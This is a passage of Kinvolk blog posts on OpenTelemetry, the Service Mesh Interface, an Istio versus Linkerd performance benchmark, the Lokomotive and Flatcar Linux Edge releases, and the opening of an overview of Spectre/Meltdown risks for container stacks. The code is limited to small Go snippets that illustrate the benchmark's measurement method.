Fortunately, the community recognized this issue and the teams got together to agree to focus their efforts on a new project. OpenTelemetry would combine the best aspects of OpenTracing and OpenCensus in one definitive standard, backed by all the major players in the industry.

We at Kinvolk are proud to be part of this important initiative, and grateful to LightStep for sponsoring and supporting our work in this area.

The Road Ahead

The immediate focus for our team working on OpenTelemetry is to help the community create a first release that meets the production needs of users at least as well as both OpenTracing and OpenCensus. The community has defined the ambitious goal of achieving this milestone in September 2019, with the OpenTracing and OpenCensus projects being retired by November.

In short, the next few months are crucial for uniting the developer and user communities behind a single vision for the future of distributed tracing and metrics.

Our involvement, working with LightStep and led by our CTO and co-founder Alban Crequy, is to develop various language implementations, starting with Go and Python but eventually expanding to every major language, and contributing to the special interest groups (SIGs) who are still defining the APIs.

We are also starting to look at how we can add auto-instrumentation into OpenTelemetry, to make it as simple to adopt as possible, and enable the ultimate vision of zero touch, complete observability for all cloud native applications.

This is exciting, technically challenging work that significantly advances the state of the art in open source — exactly the kind of project we at Kinvolk like to get involved in!

How PubNative is Saving 30% on Infrastructure Costs with Kinvolk, Packet, and Kubernetes

Earlier this year, mobile advertising technology leader PubNative approached Kinvolk with an interesting challenge: rapid business growth meant their cloud bill was also growing rapidly. Leveraging Packet’s bare metal cloud locations around the globe, they believed they could benefit from significant cost savings and achieve greater flexibility with a multi-cloud architecture.

Running Kubernetes in a bare metal environment was not the same as in AWS, though, and PubNative needed help. Kinvolk brought the technology, expertise and collaborative approach to enable them to successfully migrate their application from Amazon Web Services to Packet, resulting in cost savings of hundreds of thousands of dollars.

Read our case study to find out more about PubNative’s business, the technical challenges, and final results of the project.

How the Service Mesh Interface (SMI) fits into the Kubernetes landscape

Today, the Service Mesh Interface (SMI) was announced at Microsoft’s KubeCon keynote. The SMI aims to provide a consistent interface for multiple service meshes within Kubernetes. Kinvolk is proud to be one of the companies working on the effort. Specifically, we’ve worked to enable Istio integration with the SMI.

A look at Kubernetes Interfaces

Kubernetes has many interfaces, and for good reason. Interfaces allow for multiple underlying implementations of the technology they target. This allows vendors to create competing solutions on a level playing field and helps to guard users from being locked in to a particular solution. The result is increased competition and more rapid innovation; both a benefit to users.

To give context, let’s look at a couple of the important interfaces used in Kubernetes.

Container Network Interface

One of the first interfaces that found its way into Kubernetes was the Container Network Interface (CNI), a technology originally found in the rkt project. Previous to the existence of this interface, you had to use Kubernetes’ limited, built-in networking. With the introduction of the CNI, which standardized the requirements for a networking plug-in around a very simple set of primitives, we witnessed an explosion in the number of networking solutions for Kubernetes, from container-centric open source projects such as flannel and Calico, to SDN infrastructure vendors like Cisco and VMware, to cloud-specific CNIs from AWS and Azure. CNI was also adopted by other orchestrators, such as Mesos and CloudFoundry, making it the de facto unifying standard for container networking.

Container Runtime Interface

The Container Runtime Interface (CRI) was introduced to enable the use of different container runtimes with Kubernetes. Prior to the introduction of the CRI, adding an additional container runtime required code changes throughout the Kubernetes code base. This was the case when rkt was introduced as an additional runtime, and it was obvious that this was not a maintainable approach as more container runtimes appeared. With the CRI, we now have many additional container runtimes to choose from: containerd, CRI-O, Virtlet, and more.

Container Storage Interface

While relatively new, the Container Storage Interface (CSI) has achieved similar success. It defines a standard approach for exposing block and file storage systems to container orchestrators like Kubernetes. Unlike volume plug-ins, which were “in-tree”, meaning they had to be upstreamed into the main Kubernetes codebase, CSI drivers are external projects, enabling storage developers to develop and ship independently of Kubernetes releases. There are now more than 40 CSI drivers including for Ceph, Portworx, and all the major cloud providers.

And Now: Service Mesh Interface (SMI)

Service Meshes are becoming popular because they provide fine-grained control over microservice connectivity, enabling (for example) smooth transition from an older release of a service to a newer one (e.g. a blue/green or canary deployment model). Linkerd was probably the first such solution, but it has been followed by Istio and many others.

With the growing proliferation of solutions, all deployed and managed in slightly different ways, it was clear that a similar standard interface for enabling service meshes – a Service Mesh Interface (SMI) – would bring value to the Kubernetes community, in much the same way that CRI, CNI and CSI did. Kinvolk was among the group of development teams that contributed to this effort, along with the other participating companies. Specifically, we developed the plugin driver that enables Istio to be deployed via SMI.

The Service Mesh Interface promises a common interface for various service meshes. This should make it easier for users to experiment with alternative service mesh solutions, to see which works best for their use cases. As we have found with our own recent testing, due to their differing implementations, each solution has its own unique performance and behavior characteristics. We are hopeful this will lead to greater user choice, and flourishing of new projects in the ecosystem just as happened with other areas where Kubernetes enabled open extensibility.

Performance Benchmark Analysis of Istio and Linkerd

Updated on 2019-05-29 with clarifications on Istio’s mixer configuration for the “tuned” benchmark, and adding a note regarding performance testing with the “stock” configuration we used.

The Istio community has updated the description of the “evaluation configuration” based on the findings of this blog post. While we will not remove the original data from this blog post for transparency reasons, we will focus on data of the “tuned istio” benchmark for comparisons to linkerd.


Over the past few years, the service mesh has rapidly risen to prominence in the Kubernetes ecosystem. While the value of the service mesh may be compelling, one of the fundamental questions any would-be adopter must ask is: what’s the cost?

Cost comes in many forms, not the least of which is the human cost of learning any new technology. In this report we restrict ourselves to something easier to quantify: the resource cost and performance impact of the service mesh at scale. To measure this, we ran our service mesh candidates through a series of intensive benchmarks. We consider Istio, a popular service mesh from Google and IBM, and Linkerd, a Cloud Native Computing Foundation (CNCF) project.

Buoyant, the original creators of Linkerd, approached us to perform this benchmark and tasked us with creating an objective comparison of Istio and Linkerd. As this allowed us to dive more deeply into these service mesh technologies, we gladly accepted the challenge.

It should be noted that Kinvolk currently has ongoing client work on Istio. Our mission is to improve open source technologies in the cloud native space and that is the spirit by which we present this comparison.

We are releasing the automation for performing the below benchmarks to the Open Source community. Please find our tooling at


We had three goals going into this study:

  1. Provide a reproducible benchmark framework that anyone else can download and use.
  2. Identify scenarios and metrics that best reflect the operational cost of running a service mesh.
  3. Evaluate popular service meshes on these metrics by following industry best practices for benchmarking, including controlling for sources of variability, handling coordinated omission, and more.


We aim to understand mesh performance under the regular operating conditions of a cluster under load. This means that cluster applications, while being stressed, are still capable of responding within a reasonable time frame. While the system is under (test) load, the user experience when accessing web pages served by the cluster should not suffer beyond an acceptable degree. If, on the other hand, latencies were regularly pushed into the seconds (or minutes) range, a real-world cluster application would provide a bad user experience, and operators (or auto-scalers) would scale out.

In the tests we ran, the benchmark load - in terms of HTTP requests per second - is set to a level that, while putting both application and service mesh under stress, also allows traffic to still be manageable for the overall system.


rps, User Experience, and Coordinated Omission

HTTP traffic at a constant rate of requests per second (rps) is the test stimulus, and we measure response latency to determine the overall performance of a service mesh. The same rps benchmark is also performed against a cluster without any service mesh (“bare”) to understand the performance baseline of the underlying cluster and its applications.

Our benchmarks take Coordinated Omission into account, further contributing towards a UX centric approach with objective latency measurement. Coordinated Omission occurs when a load generator issues new requests only after previously issued requests have completed, instead of issuing a new request at the point in time where it would need to be issued to fulfill the requests per second rate requested from the load generator.

As an example, if we want to measure latency with a load of 10 requests per second, we need to send out a new request every 100 milliseconds, at a constant rate of 10 Hz. But when a load generator waits for the completion of a request that takes longer than 100 ms, the rps rate is not maintained: only 9 (or fewer) requests are issued during that second instead of the requested 10. This behaviour has two drawbacks. First, high latency is attributed only to the single slow request, even though successive requests also experience elevated latency - not because they take long to complete, but because they are issued too late to begin with. Second, the application / service mesh under load is granted a small pause from ongoing load during the delayed response, as no new request is issued when it would need to be to match the requested rps. This is far from the reality of a “user stampede”, where load quickly piles up in high-latency situations.
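To make the effect concrete, here is a small, self-contained Go simulation (our own illustration, with made-up numbers): at 10 rps, a single 350 ms stall delays the requests queued behind it, but a coordinating load generator records only the one slow sample:

```go
package main

import "fmt"

// latencies replays a schedule of one request every `interval` ms over a
// single connection, where each request takes serviceTimes[i] ms to complete.
// withCO is what a coordinating generator records: just the service time of
// each request. corrected measures from the *intended* send time, as wrk2
// does, so queueing delay behind a stall is attributed to each late request.
func latencies(serviceTimes []int, interval int) (withCO, corrected []int) {
	now := 0 // the sender's clock, in ms
	for i, st := range serviceTimes {
		withCO = append(withCO, st)
		intended := i * interval // when the request *should* go out
		start := now
		if start < intended {
			start = intended // on schedule: wait until the intended time
		}
		corrected = append(corrected, start-intended+st)
		now = start + st // next request can only be sent after this one returns
	}
	return
}

func main() {
	// 10 rps => one request every 100 ms; the first request stalls for 350 ms.
	withCO, corrected := latencies([]int{350, 10, 10, 10}, 100)
	fmt.Println(withCO)    // [350 10 10 10]  - only one sample looks slow
	fmt.Println(corrected) // [350 260 170 80] - the queueing delay is visible
}
```

With Coordinated Omission, the three trailing requests look like 10 ms each; measured from their intended send times, they actually suffered 260, 170 and 80 ms of user-visible latency.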

For our benchmarks, we use wrk2 to generate load and to measure round-trip latency from the request initiator side. wrk2 is a friendly fork, by Gil Tene, of the popular HTTP benchmarking tool wrk, by Will Glozer. wrk2 takes the requested throughput as a parameter, produces constant-throughput load, eliminates Coordinated Omission by measuring latency from the point in time where a request should have been issued, and also makes an effort to “catch up” if it detects that it’s late, by temporarily issuing requests twice as fast as the original rps rate. wrk2 furthermore incorporates Gil Tene’s “HDR Histogram” work, where samples are recorded without loss of precision. Longer test execution times contribute to higher precision, giving us more precise data particularly for the upper percentiles we are most interested in.

For the purpose of this benchmark, we extended the capabilities of wrk2, adding the handling of multiple server addresses and multiple HTTP resource paths. We do not consider our work a fork and will work with upstream to get our changes merged.


For evaluating performance we look at latency distribution (histograms), specifically at tail latencies in the highest percentiles. This reflects the benchmark’s focus on user experience: a typical web page or web service requires more than one, possibly many, requests to perform a single user action. If one request is delayed, the whole action is delayed. A latency that is p99 for individual requests thus becomes significantly more common in complex operations, e.g. a browser fetching all the resources a web page is made of in order to render it - that’s why p99 and higher percentiles matter to us.
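A quick back-of-the-envelope calculation illustrates this. If each request independently has a 1% chance of landing in the p99 tail, a user action composed of n requests hits the tail with probability 1 - 0.99^n (our own arithmetic sketch, not benchmark data):

```go
package main

import (
	"fmt"
	"math"
)

// tailProbability returns the chance that at least one of n independent
// requests falls above the p-th percentile latency (p given as a fraction,
// e.g. 0.99 for p99).
func tailProbability(p float64, n int) float64 {
	return 1 - math.Pow(p, float64(n))
}

func main() {
	for _, n := range []int{1, 10, 50, 100} {
		fmt.Printf("%3d requests: %.1f%% chance of hitting the p99 tail\n",
			n, 100*tailProbability(0.99, n))
	}
}
```

At 50 requests per user action - not unusual for a modern web page - roughly 39.5% of actions include at least one p99-tail request, which is why the upper percentiles dominate perceived performance.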

Resource Consumption

Nothing comes for free - using a service mesh makes a cluster consume more resources for its operation, taking resources away from the business logic. To better understand this impact, we measure both the CPU load and the memory consumed by the service mesh control plane and by the service mesh’s application proxy sidecars. CPU utilization and memory consumption are measured at short intervals on a per-container level during test runs; the maximum resource consumption of components during individual runs is selected, and the median over all test runs is calculated and presented as the result.
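The aggregation described above - the peak sample within each run, then the median of those peaks across runs - can be sketched as follows (the sample numbers are invented for illustration):

```go
package main

import (
	"fmt"
	"sort"
)

// runMaxMedian takes per-interval samples grouped by benchmark run, selects
// the peak sample within each run, and returns the median of those peaks.
func runMaxMedian(runs [][]float64) float64 {
	maxes := make([]float64, 0, len(runs))
	for _, samples := range runs {
		m := samples[0]
		for _, s := range samples[1:] {
			if s > m {
				m = s
			}
		}
		maxes = append(maxes, m)
	}
	sort.Float64s(maxes)
	n := len(maxes)
	if n%2 == 1 {
		return maxes[n/2]
	}
	return (maxes[n/2-1] + maxes[n/2]) / 2
}

func main() {
	// Hypothetical memory samples (MiB) for one container over four runs.
	runs := [][]float64{
		{210, 380, 395}, // peak 395
		{205, 360, 410}, // peak 410
		{198, 340, 388}, // peak 388
		{220, 400, 405}, // peak 405
	}
	fmt.Println(runMaxMedian(runs)) // median of {388, 395, 405, 410} = 400
}
```

Taking the per-run maximum captures the worst-case footprint of a run, while the median across runs discards outlier runs on noisy hardware.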

We observed that memory consumption peaks at the end of a benchmark run. This is expected, since (as outlined above) wrk2 issues a constant throughput rate - load will pile up when latency increases over a certain threshold - so memory resources, once allocated, are unlikely to be freed until the benchmark is over. CPU utilization per time slice also stayed at high levels and never broke down during runs.

Benchmark Set-up

The Cluster

We use automated provisioning for our test clusters for swift and easy cluster set-up and teardown, allowing for many test runs with enough statistical spread to produce robust data.

For the benchmarks run during our service mesh performance evaluation, we used a cluster of 5 workers. Each worker node sports a 24 core / 48 thread AMD EPYC(r) CPU at 2.4GHz, and 64 GB of RAM. Our tooling allows for a configurable number of nodes, allowing for re-running these tests using different cluster configurations.

Load is generated and latency is measured from within the cluster, to eliminate noise and data pollution from ingress gateways - we’d like to fully focus on service meshes between applications. We deploy our load generator as a pod in the cluster, and we reserve one cluster node for load generation / round-trip latency measurement, while using the remaining four nodes to run a configurable number of applications. In order to maintain sufficient statistical spread, we randomly pick the “load generator” node for each run.

One random node is picked before each run and reserved exclusively for the load generator. The remaining nodes run the application under load.

For the purpose of this test we used Packet as our IaaS provider; the respective server type used for worker nodes is c2.medium. Packet provides “bare metal” IaaS - full access to physical machines - allowing us to eliminate neighbour noise and other contention present in virtualized environments.

Cluster Applications

As discussed in the “Metrics” section above, we use wrk2 to generate load, and augment the tool to allow benchmarks against multiple HTTP endpoints at once.

The application we run the benchmark against is “Emojivoto”, which ships as a demo app with Linkerd but is not tied to Linkerd functionality, or to service meshes in general (Emojivoto runs fine without a service mesh). Emojivoto uses an HTTP microservice by the name of web-svc (a Kubernetes Service of type LoadBalancer) as its front-end. web-svc communicates via gRPC with the emoji-svc and voting-svc back-ends, which provide emojis and handle votes, respectively. We picked Emojivoto because it is clear and simple in structure, yet contains all the elements of a cloud-native application that matter to us when benchmarking service meshes.

The emojivoto application consists of 3 microservices.

However, benchmarking service meshes with only a single application would be a far cry from real-world use cases where service meshes matter - those are complex set-ups with many apps. In order to address this issue yet keep our set-up simple, we deploy the Emojivoto app a configurable number of times and append a sequence counter to service account and deployment names. As a result, we now have a test set-up that runs web-svc-1, emoji-svc-1, voting-svc-1 alongside web-svc-2, emoji-svc-2, voting-svc-2, etc. Our load generator will spread its requests and access all of the apps’ URLs, while observing a fixed overall rps rate.

Looping over the deployment yaml and appending counters to app names allows us to deploy a configurable number of applications.
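The renaming scheme can be sketched in Go; `replicatedNames` is our illustration of the idea, not the actual deployment tooling:

```go
package main

import "fmt"

// replicatedNames appends a sequence counter to each Emojivoto service name,
// yielding web-svc-1, emoji-svc-1, ... as described above.
func replicatedNames(services []string, copies int) []string {
	var out []string
	for i := 1; i <= copies; i++ {
		for _, svc := range services {
			out = append(out, fmt.Sprintf("%s-%d", svc, i))
		}
	}
	return out
}

func main() {
	names := replicatedNames([]string{"web-svc", "emoji-svc", "voting-svc"}, 2)
	fmt.Println(names)
	// [web-svc-1 emoji-svc-1 voting-svc-1 web-svc-2 emoji-svc-2 voting-svc-2]
}
```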

On Running Tests and Statistical Robustness

As we are using the datacenters of a public cloud provider - Packet - to run our benchmarks, we have no control over which specific servers are picked for individual deployments. The age of a machine and its components (memory, CPU, etc.), its position in the datacenter relative to the other cluster nodes (same rack? same room? same fire zone?), and the state of the physical connections between the nodes all have an impact on the raw data any individual test run produces. The activity of other servers unrelated to our test, but present in the same datacenter and sharing the same physical network resources, might have a detrimental effect on test runs, leading to dirty benchmark data. We apply sufficient statistical spread, with multiple samples per data point, to eliminate the volatile effects of outside operations on the same physical network when comparing data points relative to each other - i.e. Istio’s latency and resource usage versus Linkerd’s. We furthermore use multiple clusters in different datacenters, with implicitly different placement layouts, to also help us draw absolute conclusions from our data.

In order to achieve sufficient statistical spread we execute individual benchmark runs twice to derive average and standard deviation. We run tests in two clusters of identical set-up in parallel to make sure our capacity does not include a “lemon” server (degraded hardware) or a bad switch, or has nodes placed at remote corners in the datacenter.

A typical benchmark test run would consist of the following steps. These steps are run on two clusters in parallel, to eliminate the impact of “lemon” servers and bad networking.

=> Before we start, we reboot all our worker nodes.

=> Then, for each of “istio-stock”, “istio-tuned”, “linkerd”, “bare”, do, on 2 clusters simultaneously:

  1. Install the service mesh (skip if benchmarking “bare”, i.e. w/o service mesh)
  2. Deploy emojivoto applications
  3. Deploy benchmark load generator job
  4. Wait for the job to finish, while pulling resource usage metrics every 30 secs
  5. Pull benchmark job logs which contain latency metrics
  6. Delete benchmark load generator job and emojivoto
  7. Uninstall service mesh
  8. Goto 1. to benchmark the next service mesh (linkerd -> istio -> bare)
  9. After all 4 benchmarks concluded, start again with the first service mesh,
    and run the above twice to gain statistical coverage


We provisioned the clusters using Kinvolk’s recently announced Kubernetes distribution, Lokomotive. The code for automating both the provisioning of the test clusters and the benchmark runs is available under an open source license in the GitHub repo, so others can reproduce the benchmark results and, we hope, contribute improvements.

As mentioned above, we are also releasing our extensions to wrk2.

Benchmark runs and observations

We benchmarked “bare” (no service mesh), “Istio-stock” (without tuning), “Istio-tuned”, and “Linkerd” with 500 requests per second, over 30 minutes. Benchmarks were executed twice successively per cluster, in 2 clusters - leading to 4 samples per data point. The test clusters were provisioned in separate data centers in different geographical regions - one in Packet’s Sunnyvale datacenter, and one in the Parsippany datacenter in the New York metropolitan area.

Service mesh versions used

Istio - “stock” and “tuned”

We ran our benchmarks on Istio release 1.1.6, which was current at the time we ran the benchmarks. We benchmarked both the “stock” version that users would receive when following the evaluation set-up instructions (update: a warning has been added to the evaluation instructions following the initial release of this blog post; see details below) as well as a “tuned” version that removed memory limitations and disabled a number of Istio components, following various tuning recommendations. Specifically, we disabled Mixer’s Policy feature (while leaving telemetry active to retain feature parity with Linkerd), and disabled Tracing, Gateways, and the Prometheus add-on configuration.

Update 2019-05-29 @mandarjog and @howardjohn reached out to us via a github issue filed to the service mesh benchmark project, raising that:

  • The “stock” Istio configuration, while suitable for evaluation, is not optimized for performance testing.
  • The “tuned” Istio configuration was still enforcing a restrictive CPU limit in one case.
    • We removed the limitation and increased the limits in accordance with suggestions we received in the github issue.
    • We re-ran a number of tests but did not observe significant changes from the results discussed below - the relations of bare, Linkerd, and Istio latency remained the same. Also, Istio continued to expose latencies in the minute range when being overloaded at 600rps. Please find the re-run results in the github issue.


Linkerd

We used Linkerd’s Edge channel and went with Linkerd2-edge-19.5.2, the latest Linkerd release available at the time we ran the benchmarks. We used Linkerd as-is, following the default set-up instructions, and did not perform any tuning.

Gauging the limits of the meshes under test

Before we started our long-running benchmarks at constant throughput and sufficient statistical spread, we gauged throughput and latency of the service meshes under test in much shorter runs. Our goal was to find the point of load where a mesh would still be able to handle traffic with acceptable performance, while under constant ongoing load.

For our benchmark set-up with 30 Emojivoto applications / 90 microservices - averaging 7.5 apps, or 22 microservices, per application node - we ran a number of 10 minute benchmarks with varying RPS to find the sweet spot described above.

Individual benchmark run-time

Since we are most interested in the upper tail percentiles, the run-time of individual benchmark runs matters. The longer a test runs, the higher the chances that increased latencies pile up in the 99.9999th and the 100th percentile. To reflect both a realistic “user stampede” and its mitigation by new compute resources coming online, we settled on a 30 minute benchmark run-time. Please note that while we feel that new resources, particularly in auto-scaled environments, should be available much sooner than after 30 minutes, we also believe 30 minutes is a robust safety margin to cover unexpected events like provisioning issues while autoscaling.

Benchmark #1 - 500RPS over 30 minutes

This benchmark was run over 30 minutes, with a constant load of 500 requests per second.

Latency percentiles

Logarithmic Latency (in milliseconds) for 500 requests per second

We observed a surprising variance in the bare metal benchmark run, leading to rather large error bars - something Packet may want to look into on the occasion. This has a strong effect on the 99.9th and the 99.999th percentile in particular; however, the overall tendency is confirmed by the remaining latency data points. We see Linkerd leading the field, and not much of a difference between stock and tuned Istio when compared to Linkerd. Let’s look at resource usage next.

Memory usage and CPU utilization

We measured memory allocation and CPU utilization at their highest point in 4 individual test runs, then used the median and highest/lowest values from those 4 samples for the above charts. The outlier sample for Linkerd’s control plane memory consumption was caused by a linkerd-prometheus container which consumed twice the amount of memory as the overall Linkerd control plane did on average.

With Istio, we observed a number of control plane containers (pilot, and related proxies) disappear in the middle of benchmark runs. We are not entirely certain of the reasons and did not do a deep dive; however, we did not include resource usage of the “disappearing containers” in our results.

Benchmark #2 - 600RPS over 30 minutes

This benchmark was run over 30 minutes, with a constant load of 600 requests per second.

Latency percentiles

Logarithmic Latency (in milliseconds) for 600 requests per second

We again observe strong variations in bare metal network performance in Packet’s datacenters; however, these arguably have less impact on the service mesh data points than in the 500rps benchmark. We are approaching the upper limit of acceptable response times for Linkerd, with the maximum latency measured at 3s in the 100th percentile.

With this load, Istio easily generated latencies in the minutes range (please bear in mind that we use a logarithmic Y axis in the above chart). We also observed a high number of socket / HTTP errors - affecting 1% to 5.2% of requests issued, with the median at 3.6%. Also, we need to call out that the effective constant throughput rps rate Istio was able to manage at this load was between 565 and 571 rps, with the median at 568 rps. Istio did not perform 600rps in this benchmark.

Update 2019-05-28: We would like to explicitly call out that Istio clusters would have scaled out long before reaching this point - therefore the minute-range latency does not reflect real-world experiences of Istio users. At the same time, it is worth noting that, while Istio is overloaded, Linkerd continues to perform within a bearable latency range, without requiring additional instances or servers to be added to the cluster.

Memory usage and CPU utilization

While the above charts imply a bit of an unfair comparison - after all, we’re seeing Linkerd’s resource usage at 600rps, and Istio’s at 570rps - we still observe an intense hunger for resources on the Istio side. We again observed Istio containers disappearing mid-run, which we ignored for the above results.


Conclusion

Both Istio and Linkerd perform well, with acceptable overhead at regular operating conditions, when compared to bare metal. Linkerd takes the edge on resource consumption, and when pushed into high load situations, maintains acceptable response latency at a higher rate of requests per second than Istio is able to deliver.

Future Work

With our investment in automation to perform the above benchmarks, we feel that we created a good foundation to build on. Future work will focus on extending features and capabilities of the automation, both to improve existing tests and to increase coverage of test scenarios.

Most notably, we feel that limiting the benchmark load generator to a single pod is the largest limitation of the above benchmark tooling: the amount of traffic we can generate is capped by the capacity of the physical machine the benchmark tool runs on. Overcoming this limitation would allow for more flexible test set-ups. However, running multiple pods in parallel poses a challenge when merging results, i.e. merging the “HDR Histogram” latency statistics of individual pods without losing the precision we need to gain insight into the high tail percentiles.

Driving Kubernetes Forward with Lokomotive

Over the past few years, Kinvolk has been fortunate to work with some of the leading names in the industry on some of the most interesting projects in the cloud-native space. This work has without exception relied on our team’s deep knowledge of Linux, containers, Kubernetes and how these all work together. Our team’s rare ability to affect every layer of the Kubernetes stack has provided technology-spanning benefits and the driving motivations for our next steps.

With that background, today we are announcing Lokomotive, a full-stack Kubernetes distribution with three overarching goals:

  • Be a secure, stable and dynamic Kubernetes distribution: First and foremost, Lokomotive is made to be production-ready, meaning it delivers on the fundamental qualities organizations require to entrust their business-critical workloads.
  • Drive cutting-edge Linux technologies into Kubernetes: Lokomotive will be our engine to drive the cutting-edge technologies delivered by Flatcar Linux Edge into Kubernetes. Currently this includes Linux 5.1, cgroup v2, Wireguard, new BPF features, OCI hooks integration with BPF, and more. This will ensure that Lokomotive is positioned to be the first Kubernetes distribution to take advantage of such features.
  • Deliver a production-grade, completely open-source product: Kinvolk was founded on our belief that open source is the best way to develop software and drive innovation. We have done that through our community contributions and commercial engineering services. We will continue to be true to our open source ethos as we offer commercial support for Lokomotive, Flatcar Linux and future products.

What is Lokomotive?

Lokomotive is a Kubernetes distribution inspired by CoreOS Tectonic and built to run atop Flatcar Linux. Like Tectonic, Lokomotive is a self-hosted Kubernetes, meaning the Kubernetes components run in containers managed by Kubernetes itself, taking advantage of Kubernetes’ built-in scaling and resiliency features.

The main Lokomotive repository is a fork of former CoreOS engineer Dalton Hubble’s Typhoon project. Thanks to his efforts, Lokomotive starts from a stable foundation upon which we can build.

Platform support currently includes AWS, Azure, Baremetal, GCE and Packet. Others will be added over time.


The main entry point of Lokomotive is lokoctl, the Lokomotive installer. lokoctl packages the entire Lokomotive install experience into an easy to use binary. Configuration is done using HCL-based configuration files. lokoctl development is ongoing and it will be made available by the time full commercial support of Lokomotive is announced.

Lokomotive Components

Lokomotive aims to include the necessary components needed for production Kubernetes deployments. For this we have Lokomotive Components. Lokomotive Components provide all the cluster elements needed before applications are deployed: monitoring, ingress, logging, networking, storage, service mesh, authentication provider, etc. With this approach, we also ensure we deliver a secure configuration out-of-the-box, including secure default settings, authentication, and certificate management. Cluster settings and Components are configured via declarative HCL-based configuration files ensuring a consistent, fully automatable cluster creation process and the ability to treat individual clusters as disposable, easily replicated deployment artifacts.

We’ll be revealing more details about Lokomotive at the same time that we announce full commercial support availability.

What’s next for Lokomotive?

Today we are opening up the first seeds of Lokomotive. A fully supported Lokomotive release with lokoctl and Lokomotive Components will be available this summer.

These first seeds provide a solid base Kubernetes experience. But our main motivation at this point is to start pushing cutting-edge Linux technologies into Kubernetes, leveraging Flatcar Linux Edge. Thus, over the next few months, you can expect Lokomotive to be used to demonstrate some of the new ideas we’d like to see in Kubernetes.

Client-driven development

With production Lokomotive clusters serving hundreds of thousands of requests per second of business-critical traffic, we already know Lokomotive is a stable and reliable technology. We are now working with clients to improve the Lokomotive user experience in preparation for general availability.

If you are looking to have a solid Kubernetes platform and work with experts to drive new technologies forward, please reach out at [email protected] or via IRC (Freenode #lokomotive-k8s).


Introducing the Flatcar Linux Edge Channel

Today, Kinvolk is making available a new channel to Flatcar Linux, Flatcar Linux Edge. This channel serves to deliver experimental Linux OS technologies to the Kubernetes developer community in an easily accessible manner. The goal is to accelerate the adoption of cutting-edge Linux technologies in Kubernetes and related projects.


First announced just over a year ago, Flatcar Linux is Kinvolk’s drop in replacement for CoreOS’ Container Linux. There were two main reasons we decided to initiate the fork. Firstly, we believe the technology is sound and valuable. Secondly, we saw the potential for using Flatcar Linux as a means of driving innovative Linux technologies into Kubernetes and the wider cloud native ecosystem. With the Flatcar Linux Edge channel we are now executing on this second point by providing a channel that delivers cutting edge Linux technologies in an easily accessible manner.

What is Flatcar Linux Edge?

Flatcar Linux Edge is an experimental Linux distribution for containers delivered as an additional channel alongside the existing stable, beta, and alpha channels. While the existing channels are intended to serve as a delivery process for stable releases, the edge channel delivers experimental features not intended for production environments. Rather, the edge channel is intended to serve as a common platform for the cloud native and Kubernetes community to experiment with new Linux OS technologies.

The Flatcar Linux Edge channel differs in several key aspects that set it apart from the existing channels. For example, the edge channel

  • lives independent of the standard channel flow; changes are not necessarily expected to flow into any of the other channels.
  • ships features that are not stable and may come and go. Only features with maintainers will be accepted, and unmaintained features will be removed. These changes will be included in the release notes.
  • is in no way supported. The other channels are part of Kinvolk’s Flatcar support coverage; the edge channel is not.

What’s in the initial channel release?

The first release of the Flatcar Linux Edge channel ships the following collection of enhancements, among them those needed to demonstrate upcoming BPF tools the Kinvolk team will be highlighting in follow-up posts. These initial features are…

  • Wireguard a fast and modern in-kernel VPN technology
  • cgroups v2 enabled by default on the system and in container workloads
  • cri-o a container runtime built for Kubernetes
  • some hardcoded OCI hooks to ease experimentation in Kubernetes
  • additional tools installed on the host, available to aforementioned OCI hooks: bpftool, cgroupid

Ideas for future inclusion

In the future, we’d like to see support for

These are just the things we at Kinvolk have thought of. We’re looking forward to seeing what kind of things the community would like to add.

Why Flatcar Linux Edge?

At Kinvolk we frequently work on cutting-edge Linux technologies that are not yet available in conventional Linux distributions. In doing so, we spend a good amount of time setting up and configuring systems; compiling kernels, patching software and configurations, etc. With edge we want others to benefit from this effort and also provide the community a platform to deliver and experiment with such technologies. We think Flatcar Linux Edge can be the platform for driving innovative features into Kubernetes and related tooling.

Get involved!

As an unstable, experimental channel, the barrier of getting a feature in is decidedly low. The only requirement is that you commit to maintaining that feature or see it removed in future releases. So if you have ideas, get in touch.

Hardware vulnerabilities in cloud-native environments

The Spectre/Meltdown family of information disclosure vulnerabilities—including the more recent L1 Terminal Fault (aka “Foreshadow”)—are a new class of hardware-level security issues which exploit optimizations in modern CPUs that involuntarily leak information. This potentially has a subtle impact on container workloads, particularly in a virtualized environment. This post will look at the individual OS abstraction levels of a generic container stack, and discuss risks and mitigations in a variety of scenarios.

Let’s start by describing what we’ve labelled the “generic container stack” above. We’ll use this model throughout the document to illustrate various threat scenarios. Whether we operate our own infrastructure (bare metal, VMWare, OpenStack, OpenNebula, etc.), or are customers of an IaaS (GCE, EC2) or PaaS (GKE, AKS) offering, we should know the implications of Spectre/Meltdown for the stack we are using. This will allow us to ensure the security of our cluster, be it through direct action or through qualified inquiries to our service providers. Meet our stack:

At the lowest level is your application, as our smallest - atomic - unit.

Typically, we deal with individual applications running with container isolation. Nothing much changes in our picture so far.

To run workloads in parallel, operators may opt to put a number of containers into a sandbox, most commonly a virtual machine. Virtualization, apart from isolation, also abstracts from the hardware level, easing maintenance operations. Some implementations skip this virtualization layer - we’ll look at the implications (not necessarily negative) further below.

IaaS operators aim to consolidate their physical hardware, so bare metal hosts are filled with a number of sandboxes to saturate CPU and I/O.

While sandboxing traditionally isolates containers from traditional attacks that exploit flaws in applications’ implementations, the underlying physical host’s CPU introduces new attack vectors.

Now that we have a mental model of our target environment, let’s consider the actual class of attacks we’re dealing with. Spectre, Meltdown et al. are a new category of security vulnerabilities that exploit side effects of CPU optimizations for code execution and data access. Those optimizations—speculative execution of instructions—were originally meant to run hidden, without any user-visible impact on CPU execution states. In 2018, the general public learned that there are indeed observable side effects, exploitable by priming a CPU’s speculative execution engine. This creates a side channel for the attacker to draw conclusions on the victim’s workload and data.

While we will only briefly discuss the attacks, Jon Masters’ presentation and slides on Spectre/Meltdown provide an excellent and thorough introduction.

The family of attacks works against applications that run on the same core, as well as applications running on the other sibling of a hyperthreaded core. It requires exploitable segments suitable for leaking information (“gadgets”) in the victim’s code. Overall, the family of hardware information disclosure vulnerabilities, so far, includes:

  • v1, the original
  • v2, with branch prediction priming independent from the code attacked
  • v3 and v3a aka “Meltdown”
  • v4, bypassing stores and leaking “scrubbed” memory
  • Level 1 Terminal Fault, or “Foreshadow”

How does this work?

